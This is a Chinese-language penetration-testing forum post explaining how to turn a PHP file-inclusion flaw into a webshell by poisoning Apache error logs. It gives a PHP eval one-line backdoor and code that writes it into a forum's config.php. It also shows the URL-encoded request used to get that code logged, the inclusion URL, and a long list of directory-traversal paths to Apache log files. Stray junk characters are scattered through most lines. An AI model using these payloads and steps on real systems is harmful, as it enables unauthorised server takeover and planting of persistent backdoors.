找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1930|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
. W; i5 |" t! T4 a; V' Y9 i7 R5 |/ T4 ^7 @% ~
比如还是这句一句话木马 ( N) B' ^' l& U0 M$ M# Z
<?eval($_POST[cmd]);?>   
5 c. \! C6 o& }* }- L/ U) S3 w8 D0 O$ u' |; N. b3 j+ E( U) B
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
: w' b2 r" L) b  zfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 # s* e0 _. F: G# W

+ _. W) {  H8 K( @! r3 t) D<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
. M  n" F. c( z" x! _& `fclose($fp);?>   //在config.php里写入一句木马语句 6 s& I& T, e. e, w4 H" i
7 b# h' q0 G3 @% |
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
; B; K* D! Z: ]; V# W5 |转换为 + V, j6 y. b' m  E* k* N, O9 k
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
1 D  X, C/ u7 {' z6 D$ [/ [config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp 6 D9 r9 O) p: c+ E5 o( n. j$ G
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
7 @/ s, P1 ?8 _6 v! Q0 O3 Afclose%28%24fp%29%3B%3F%3E ' A0 b  w' Y. L3 I. O9 I  J
我们提交 ' s* W8 L6 _. b2 D, E4 s  V5 ^
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww * p$ e7 b$ h% t- S& e7 ~
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
  j7 L( F# g# V7 {( A$ C5 _, Y%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
2 ^9 |4 j7 o  z& {+ I. T2 xcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
# k6 r# M  \! i& a: _0 O) ^* R3 H& q
: O4 Y% u/ v+ c这样就错误日志里就记录下了这行写入webshell的代码。 6 j0 _; p; S% I
我们再来包含日志,提交 0 z8 i/ T4 z' ^
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
) q1 p# w: |% }) ?5 p  G6 O0 S- s! Q, c0 Z% `
这样webshell就写入成功了,config.php里就写入一句木马语句 ( ?) @% V9 L2 _" L3 M; |8 Y
OK.
/ e+ s! \# k; Z. d+ bhttp://www.xxx.com/forum/config.php这个就成了我们的webshell 2 K- g/ @" a9 C! s: M! V6 s
直接用lanker的客户端一连,主机就是你的了。
7 B8 @- S% H' n5 [0 f; F) I- K* H: ^3 S! U
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 : b2 i8 E+ i3 q7 D) H

7 O8 O0 @: p3 D: A其他的日志路径,你可以去猜,也可以参照这里。 ! O) N2 K& {8 L3 N0 f  p! f
../../../../../../../../../../var/log/httpd/access_log $ e8 u  e& \  e3 E
../../../../../../../../../../var/log/httpd/error_log 8 n8 G3 ]3 ?" R& i/ C
../apache/logs/error.log
. p$ z- k; x" J# e7 V; W../apache/logs/access.log " U3 ^: @' d1 v, S9 f
../../apache/logs/error.log
7 R4 }" l3 }+ f1 E8 q" w../../apache/logs/access.log
3 H. p; z2 I* R; Q& s# z6 B* X, R../../../apache/logs/error.log 1 @# R' L! h1 t
../../../apache/logs/access.log
1 \, D6 S0 ^) h5 n) X3 M+ V../../../../../../../../../../etc/httpd/logs/acces_log
6 C" a+ T- h0 y0 y1 U: H! M9 Z../../../../../../../../../../etc/httpd/logs/acces.log
. b& U; v& N* m9 \) L../../../../../../../../../../etc/httpd/logs/error_log + q# P) t$ `2 p9 i. i
../../../../../../../../../../etc/httpd/logs/error.log
/ J3 x+ W' C, t1 Y0 f../../../../../../../../../../var/www/logs/access_log + S0 F1 z0 R5 x1 q
../../../../../../../../../../var/www/logs/access.log
+ v3 x' z: N9 l- N( D: r$ A/ ^../../../../../../../../../../usr/local/apache/logs/access_log 5 ~& d' h2 V4 K. {: F, ]
../../../../../../../../../../usr/local/apache/logs/access.log ! I5 i$ F/ h/ s  {; l, b. `6 r
../../../../../../../../../../var/log/apache/access_log % e  m1 E4 `+ G: d4 ]
../../../../../../../../../../var/log/apache/access.log
7 Q! v2 [8 v: k7 f* E) e' ~../../../../../../../../../../var/log/access_log
6 `  [0 E8 b, b4 b6 L' N../../../../../../../../../../var/www/logs/error_log $ E6 c) ^2 V5 k1 _
../../../../../../../../../../var/www/logs/error.log % ?! U+ s$ Q- _9 n& k6 g
../../../../../../../../../../usr/local/apache/logs/error_log
3 c' p) I$ D; W../../../../../../../../../../usr/local/apache/logs/error.log 7 l4 {: Q; y; Y
../../../../../../../../../../var/log/apache/error_log * |! W* P5 I* l7 _. ~2 s7 u- G
../../../../../../../../../../var/log/apache/error.log
) @; O6 s/ d7 P0 j../../../../../../../../../../var/log/access_log ! m+ U* p- w! v0 G5 h0 Y
../../../../../../../../../../var/log/error_log 5 @% n5 d: g* z+ |; N3 K
/var/log/httpd/access_log      
( m# j% F; z# _. Z* {7 F  Z" q/ B& c: a/var/log/httpd/error_log     
4 ]& a' X) ^# k, m$ f" e- p../apache/logs/error.log     : l. w+ [$ n2 P0 d  @- U* G2 f
../apache/logs/access.log 6 g2 u+ f4 i6 t
../../apache/logs/error.log
, j' c; F0 |4 t9 i. [& ^& R& p" K../../apache/logs/access.log   K; ]4 m9 w1 P3 g. J2 {' Z& i
../../../apache/logs/error.log
! f' p9 e; i; [../../../apache/logs/access.log
0 h' @7 m- z9 Q' f/etc/httpd/logs/acces_log * G, |; Z& w( K: K
/etc/httpd/logs/acces.log
$ I+ K0 ~: i! {0 i$ w; h0 _' X/etc/httpd/logs/error_log
* \: e, @3 ]( r9 \8 j+ N/etc/httpd/logs/error.log # N. v) p! D8 [! U0 d) c
/var/www/logs/access_log
: e7 k9 D; p% @1 P/var/www/logs/access.log
$ ]8 U& t9 I" c1 T9 ]. I: \: z$ L/usr/local/apache/logs/access_log ! h6 u$ _) C5 O  Y( X
/usr/local/apache/logs/access.log * g( m1 S+ c; l# N" Y8 p3 H8 r
/var/log/apache/access_log 7 E  m) _# H# B, _
/var/log/apache/access.log 4 ^+ q+ v: o$ E7 X
/var/log/access_log
  X% u1 a: I* `$ n/ m8 c/var/www/logs/error_log ! ]4 N0 c0 ~; ^
/var/www/logs/error.log
0 P8 ~9 _7 m+ \- T! B- O: ^9 k/usr/local/apache/logs/error_log
. y+ F* T- H' W5 b/ p/usr/local/apache/logs/error.log
/ H6 m+ j, Q/ m/var/log/apache/error_log
7 k7 r9 Y# g" }4 d/var/log/apache/error.log
# b- ~: ~- F% i$ u( D/var/log/access_log   {; I2 V# t: \! _1 c
/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表